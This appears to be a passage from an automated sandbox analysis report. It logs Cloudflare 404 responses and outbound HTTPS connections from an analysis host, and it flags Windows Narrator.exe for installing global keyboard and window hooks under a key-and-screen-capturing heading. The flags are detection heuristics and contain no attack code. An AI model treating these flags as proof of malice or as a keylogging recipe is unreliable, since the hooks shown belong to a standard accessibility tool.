              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:06 GMTcontent-type: text/html; charset=utf-8cf-ray: 946ead4baeb1d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: EXPIREDreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dAratihEgLKMa1Imc0ywsf7xfFDfj1uRaAdY2xga5cNYQaFMhqhnR3X81upBuWxH6yI58QRvhCAb%2BL7CVKQAxkbT4qk06bfZ6VJDlPz6hYHpufFol43VsAbisXhtwpQOoAb2nbptFpy12Weo"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=167016&min_rtt=164385&rtt_var=3176&sent=78&recv=28&lost=0&retrans=0&sent_bytes=69118&recv_bytes=4085&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=1964&x=0"content-length: 169
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:08 GMTcontent-type: text/html; charset=utf-8cf-ray: 946ead562ee1d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: HITage: 2report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xh6OM3PSamcDhPWbEmCUjHzn86Q3a2G%2FpB43QxzcgbPV0bBYwLrdz3dwj%2B1FSYleIV5iMlAeQAyfEyLVUv4thJihAY856tS1h6EH4DUtEQ%2FICilSgmoD2UkLfXZfGLmNJ3p2lnTf6oC6lZ%2F1"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=166717&min_rtt=164385&rtt_var=2981&sent=81&recv=30&lost=0&retrans=0&sent_bytes=69827&recv_bytes=4138&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=3325&x=0"content-length: 169
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:20 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada0ee92d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IwOj08xSfxCnl0YUCjXbyMld3DMPf3HTTH66OnfNbOL%2B5MzkXqC0DCGQNQeAeOi3sOjNVaNQHqSu0LeO5T07irt83j%2BBsZz2E1fJiLXpfjnTLFjcoRzz%2BtlvakUb%2B0HI1eLFocPA0Lt1nDb6"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=170833&min_rtt=164362&rtt_var=11495&sent=135&recv=69&lost=0&retrans=0&sent_bytes=100617&recv_bytes=14819&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=15599&x=0"content-length: 173
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:20 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada0ee90d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y9wB0tCh2S5gx5JYGnHOBPhkqTm1aAIHwWs6Z1mMsbxMTptKfTbZNt45Rett3i0fTntHfU0jWqARa8uTvM7cviRSZWux6wvZxHI1THvxOgP09yvGR9lyQ3wj8XJ%2FXwEfZWzonM35ebl627bj"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=170833&min_rtt=164362&rtt_var=11495&sent=144&recv=69&lost=0&retrans=0&sent_bytes=105470&recv_bytes=14819&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=15620&x=0"content-length: 169
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada46928d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hwyoogi8xzf%2BIJXgdcE2E13z%2FNTnE5UFT6zHWTQQl%2FrEWf5VDnEsVnRXKmE3q%2Fo2x10zPrHdQrZd%2Bz6PiiF9T9jxr71QVHC8%2Ft7uKVi7oCDi%2FMSqGLb4Hy3xwtT7wv17ygbedsQTlD8QnsZ7"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=164868&min_rtt=164328&rtt_var=569&sent=176&recv=103&lost=0&retrans=0&sent_bytes=137892&recv_bytes=14975&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16161&x=0"content-length: 169
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada4590ed7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jv4uA98g%2BLyjxxKam0xPL%2Bx3Fer0nvEhLLfJjkltAq5QKgQAkBK3LS1kYnCyjZqVh71hyNp0kzz%2BNJVA2cwneFvsK0tFZVAK3Iy87yAG1Mn2%2F%2BK0vC2aRdcvqIqYqODv5mEo71j8uZ%2BwbCa%2B"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=164868&min_rtt=164328&rtt_var=569&sent=175&recv=103&lost=0&retrans=0&sent_bytes=137426&recv_bytes=14975&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16153&x=0"content-length: 173
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada7196dd7ac-LAXserver: cloudflarecontent-encoding: zstdage: 0cache-control: max-age=14400cf-cache-status: HITreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=toFFut8mEB4GEG7JYYfoCCw7Yq7%2Fe0ApEiTleKi%2B4L5y48Mu83sFREqslVdUi8W7V3KUo0Z0w9aUfJQ1%2FIbUsIPPczg07Rog9xi3cCrRTNTZQ6976HwglqECfqbQHhBiKShgs4Y7U38n1n2I"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=164774&min_rtt=164317&rtt_var=151&sent=194&recv=126&lost=0&retrans=0&sent_bytes=140016&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16282&x=0"content-length: 173
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada7091ed7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7odA8pKHzFNYpzGds12NgsHNn8j%2F2K%2BBWRarDHwoj7o%2BghGxB12Vps5L9SuEESCS4sj7jwhaUMMh3J8BxRtLtQYgpWkqjSajoMwygXyFNOtoUQoiJDJW0N6Nx%2BETkp48ASEDbF0ZJGQgV7ii"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=165388&min_rtt=164317&rtt_var=1349&sent=197&recv=130&lost=0&retrans=0&sent_bytes=140714&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16577&x=0"content-length: 173
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada7195fd7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fdu6QOjeOp%2FM%2FS1dZiNKUb2T7nAmuIINx0KQ431Za8M9uStM730OiQVCheLQ8dL47pH3hIfITs2dfs6eRjTyuRbaByg21eFS%2BvVVgNJSWoSMuK3TrdidD2WbAeddFWgk9td7NFwPqotL9q53"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=165388&min_rtt=164317&rtt_var=1349&sent=198&recv=130&lost=0&retrans=0&sent_bytes=141182&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16582&x=0"content-length: 173
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada71962d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G0CoqCp%2BHPbchkdsY2um6LP8eyWWoxwrSW4XrzqqLPcGzjvvUg6l55wo%2Bm%2F3nNFN%2Bid%2BmazcJi4woxwIANxD73JKN42s7ChAzMlKQuMxK2GjCfDxqlChDllF5%2Fl1Sjjy%2By2B8YMi8%2FkfUn9U"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=165388&min_rtt=164317&rtt_var=1349&sent=199&recv=130&lost=0&retrans=0&sent_bytes=141637&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16584&x=0"content-length: 173
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada71968d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SMSGJ%2FR7lhNhus6xiOgPT1JxJCElMzQ92um46aVG%2BDQWyTCJlFxpiTaPkTvYo9c3YrYTNjrHsKP9a9dZRNa90TVlwSi6zCxk%2Fnqk8uXUiN9h%2FxKKq0o7pn7GEhpR0SYvzbasGrSz2RQZADfe"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=165388&min_rtt=164317&rtt_var=1349&sent=202&recv=130&lost=0&retrans=0&sent_bytes=142340&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16586&x=0"content-length: 173
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada7196bd7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kzt7Jj6Xd8MVHyi%2BMamFpwtcrFSX7i%2BwqConHeZzzqdEknNEVsSH2HdaS7gK40jqmzI2oadIjYn3yoitjm3Inpo8Lt%2Bq71a9ZidXi3q7CxTHn0hkM3hnFvxDLQEZmmjpDZ5rHM4%2Bvmr4Ou9H"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=165388&min_rtt=164317&rtt_var=1349&sent=211&recv=130&lost=0&retrans=0&sent_bytes=144447&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16607&x=0"content-length: 169
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada7196ad7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uz10xFPbbcGx1xozK1b5KUmABid3eit%2BmcUOuujhSqHtsBznkcS4Lqu17xIxTFQSHYVUldkquADLD8Q5MzDtoD4BrIBa8qhyO1S%2F5AjF95tH9s54lUn4Ep907%2FuzdMEOS6tOO2Am4kX1%2FFLb"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=165388&min_rtt=164317&rtt_var=1349&sent=209&recv=130&lost=0&retrans=0&sent_bytes=143488&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16599&x=0"content-length: 173
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada71957d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1fGwJMkFnERm9QmVX5i6ye9S3c6KUphJTG2j2fplJdSOyHgn9fNan7uYwsQu1C89mssRuI5lXOqhlBEMaZlCmrNnXlYu%2B5Fq4akRfJeI%2BTYWQ7Qyqm9nxC2jzWOuRsdEpU984hhEdzfij5MS"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=165388&min_rtt=164317&rtt_var=1349&sent=210&recv=130&lost=0&retrans=0&sent_bytes=143992&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16599&x=0"content-length: 173
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada71966d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MSNwqurk%2BkmBkXdb2vskkhKOZRZd93QP1zd%2FkvwKZaFeRhJ35TezG0h5E22zUfuRF4vo8fnx70lgc%2BtcDpeGU2qhxudmH8RWUAbMo9EQfRZhimt%2FcU6F05fU6zDFGfe5xbrdU3jMzHnd4kxP"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=165388&min_rtt=164317&rtt_var=1349&sent=214&recv=130&lost=0&retrans=0&sent_bytes=145155&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16610&x=0"content-length: 169
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.69:443 -> 192.168.2.17:49751 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.17:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.138.254:443 -> 192.168.2.17:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.123.129.254:443 -> 192.168.2.17:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.113.196.254:443 -> 192.168.2.17:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.218.142:443 -> 192.168.2.17:49760 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global event hook (focus changed)
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: Path: unknown Event Start:focus Event End: focus Module: NULL
              Installs a global keyboard hook
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\Narrator.exe
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4424 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4424 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 5128 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 5128 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
